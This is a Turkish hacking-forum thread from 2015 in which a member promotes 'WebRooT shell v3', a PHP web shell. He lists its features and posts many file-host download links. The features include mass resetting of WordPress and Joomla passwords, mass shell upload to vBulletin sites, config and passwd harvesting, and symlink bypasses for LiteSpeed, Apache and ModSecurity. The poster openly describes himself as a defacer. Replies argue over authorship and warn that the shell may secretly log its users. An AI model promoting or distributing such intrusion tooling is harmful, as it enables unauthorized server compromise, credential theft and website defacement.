WebRooT Hack Tools v3 - 2015 özel yapım shell

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

DeXtrjampi

Yeni üye
23 Mar 2015
9
0
vr3TeLL.png

merhaba beyler bugün sizlere webr00t shell v3 ü tanıtacağım
webroot shell v3 2015 yılının ilk çeyreğinde kodlanmış ve şuan piyasadaki en iyi shelldir, özellikleri saymakla bitmez ama biz yine de sizler için sayalım,

v2 özelikleri;

Litespeed ByPass : Litespeed serverları bypass edebilirsiniz
Joomla MaSS : Serverdaki Tüm Joomla şifreleri Sıfırlar
Wp MAss : Serverdaki Tüm WP şifreleri Sıfırlar
Vbulletin Mass : Serverdaki tüm vb lere Shell Atar
cmd Command : İşinizi daha da kolaylaştırır ve Komut çalıştıramadığınız serverlarda
cat / ln -s / ls -la bilindik komutları çalıştırabilirsiniz
Sistem Bilgisi : Server bilgilerini gösterir
Wordpress Mass İndexer Sistemdeki Tüm Wpleri İndexlersiniz
Passwd Okuyucu : passwd okunmayan serverlarda passwd okuyup siteleri listeler

v3 özellikleri;

yukarıdaki v2 özelliklerinin yanında şu özellikler eklendi,
Cgi Simple Shell: hemen hemen tüm sunucularda çalışan cgi shell
Config Fucker: Serverdaki Tum Configleri Bularak Bir Klasor Altinda Listeler..
Mysql Load Data Bypass: mysql üzerinden sunucudaki dosyaları okur, bypass eder
Litespeed Bypass: litespeed bypass çeşididir
Lite Speed Bypass 2: litespeed bypass çeşididir
Lite Speed Bypass 3: litespeed bypass çeşididir
Apache Bypass: Apache Symlink Bypass – Dizine Configlerinizi Çekin
Apache Bypass 2: Apache Symlink Bypass 2
Mod Sec Bypass: Mod Sec. Bypass
C1 Bypass: C1 Symlink Bypass, bildiğiniz üzere cpanel sunucuların hemen hemen hepsini bypass ediyor bu özellik. artık tek tuş ile webroot shellde.

kolay gelsin arkadaşlar, "sen kimsin" diye soran olursa ben de sizler gibi defacerim, yeni çıkan verileri paylaşıp indirme sitelerinden kazanç sağlıyorum shell webroot abimize aittir kolay gelsin umarım geçemediğiniz sunucu kalmaz :D

virus total https://www.m e t ascan-online.com/en/scanresult/file/176e06fac434419981b8c089e612d7e3

Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
İndir webr00tv3 rar
http://turbobit.net/n315bjowgrv2.html
webr00tv3 - Télécharger - 4shared - webr00t shell
Zippyshare.com - webr00tv3.rar
DepositFiles
Download webr00tv3 rar
Uploadable.ch - #1 Easy & Fast File Storage
Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
YukleTr.Com Dosyalariniz Silinmesin! - Dosya Yukle
webr00tv3.rar - DosyaDepo & Dosya Upload
indirilen dosya
webr00tv3 indir webr00tv3.rar
DOSYAYUKLE.NET - DOSYA YÜKLE - DOSYA UPLOAD
http://www.filedropper.com/webr00tv3

bhvnEO7.png

DeXtrjampi

Yeni üye
23 Mar 2015
9
0
sadece dosya.tc den 156 kişi indirmiş, 76 konu görüntülenmesi var yine de kimse yorum yapmamış, emeğe saygı arkadaşlar

DeXtrjampi

Yeni üye
23 Mar 2015
9
0
iyi bypasslar arkadaşlar, shelli servere yükledikten sonra menüden seçim yapıyorsunuz kullanımını öğret diye mesaj atan arkadaş için yazıyorum bunu

xmertx5

Yeni üye
10 Kas 2009
5
0
arkadaslarım kullandıgımız dorklar ıse yaramıyoor wp ve joomla dork bılen yazarmı
bu arada elınıze saglık

sulomanım

Yeni üye
25 Tem 2008
4
0
webr00tun shellini izinsizce editleyip piyasaya süren bu densiz kim aceba ?

Lütfen gerekeni yapıp konuyu silermisiniz.

webr00tu skype'den ekleyip gereken açıklamayı ögrenebilirsiniz.

Yönetim konuyu silerse sevinirim

sadece dosya.tc den 156 kişi indirmiş, 76 konu görüntülenmesi var yine de kimse yorum yapmamış, emeğe saygı arkadaşlar

dostum webr00tun selamı var seni. yakalarsa fena yapıcakmış seni.

Darkness DeviL

Yaşayan Forum Efsanesi
8 Ağu 2009
11,543
13
Turan 🇹🇷
dikkatli kullanın log tutan bir shell olabilir. v2 de log tutuyordu shell'i.php kodları gizlenmiş. başka bir siteye yönlendirme çekerse yada exe uzantılı dosya indirmek isterse kullanmayın .Bildiğim kadarıyla v3'ü daha çıkarmadı WebRooT bilginiz olsun

DeXtrjampi

Yeni üye
23 Mar 2015
9
0
dikkatli kullanın log tutan bir shell olabilir. v2 de log tutuyordu shell'i.php kodları gizlenmiş. başka bir siteye yönlendirme çekerse yada exe uzantılı dosya indirmek isterse kullanmayın .Bildiğim kadarıyla v3'ü daha çıkarmadı WebRooT bilginiz olsun

ne demek daha çıkarmadı? sen bir moderatör olarak konulara fikrini sunmaktan ziyare konunun iyi ilerlemesini sağlamak durumundasın. piyasada log tutmayan shell yoktur ama sene 2015, exe downloaderi kimse shellde kullanmaz yani :) locale kurar denersin. neyse,

konu güncel.

Star-Turk

Kıdemli Üye
2 Kas 2012
3,516
7
ne demek daha çıkarmadı? sen bir moderatör olarak konulara fikrini sunmaktan ziyare konunun iyi ilerlemesini sağlamak durumundasın. piyasada log tutmayan shell yoktur ama sene 2015, exe downloaderi kimse shellde kullanmaz yani :) locale kurar denersin. neyse,

konu güncel.

Yani diyorsun ki bu shell log tutuyor.Öncelikle şunu belirmeliyim ki moderatör arkadaş bilgisiz arkadaşları uyarmak amaçlı bir yorum yazmış siz konuyu nerden nereye çekmişsiniz.Siz buraya konu açarak bir shell paylaşımı yapmışsınız eğer bu shell kodlarında log tutan bir kod bulunursa bunun sorumlusu siz olursunuz.Neden derseniz konuya açan ve linkleri burdaki arkadaşlara dağıtan kişi sizsiniz belki siz koymadınız log tutması için kodları ama yinede sorumlu siz sayılırsınız.Ayrıca şunu belirteyim dünya kadar loglu shell dosyaları var piyasada ama kimse php`den anlamadığından öyle direk kullanıyor php`den anlayan biri ise log kodlarını siliyor ve logsuz shell kullanıyor.Kodlar şifrelenmiş olsa bile bu şifreler çözülebiliyor.İşin kısası öyle ben konuyu açayım log tutar tutmaz beni ilgilendirmez mantığı yok burada!

REKT

Yeni üye
18 Nis 2015
5
0

Star-Turk

Kıdemli Üye
2 Kas 2012
3,516
7

DeXtrjampi

Yeni üye
23 Mar 2015
9
0
@sulomanım adlı üye çok net yazmış. Bir ona cevap vermemişsin...

kolay gelsin arkadaşlar, "sen kimsin" diye soran olursa ben de sizler gibi defacerim, yeni çıkan verileri paylaşıp indirme sitelerinden kazanç sağlıyorum
ben kimseyi tanımam etmem. ek olarak sanal alemdek imse hiçbirşeyi noterde tasdik etmiyor. sen nickini tasdik edebilir misin? hayır. biri bir yeri senin adına hacklerse kimse gelip o sensin diyip elinden tutup mahkemeye ***üremez, değil mi? yani shellde webroot v3 yazıyorsa bende bu shell webroota ait 3. versiyon shell diye anlarım. anlatabildim mi? sonuç olarak orada yazan o, shell ona ait veya değil başlığında öyle yazarım. o nicki kullanan eminim ki sanalda en az 100 kişi vardır. kullanmak isteyen kullanır, istemeyen kullanmaz.
kimse shell paylaşmasın ozaman. r57 shelli elemanın teki kodladı diye kimse r57 paylaşmayacak mı? o kodlayan elemana mı ulaşmak gerek? isteyen kullanır, istemeyen konudan çıkar. açık ve net.

Son düzenleme:
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.